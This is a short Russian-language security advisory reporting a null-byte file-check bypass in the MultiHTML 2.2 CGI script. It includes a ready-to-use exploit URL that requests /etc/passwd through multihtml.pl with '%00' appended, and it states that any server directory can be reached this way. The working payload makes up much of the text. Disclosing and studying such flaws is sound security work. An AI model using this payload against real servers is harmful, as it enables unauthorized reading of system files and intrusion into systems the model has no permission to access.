Дырке обнаружена в MultiHTML version 2.2
MultiHTML CGI скрипт проверяет существование запрашиваемого файла, но это можно легко обойти отправляя "пустой" символ "%00"
Exploit:
http://www.example.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
Таким образом можно получить доступ к любой директории сервера.
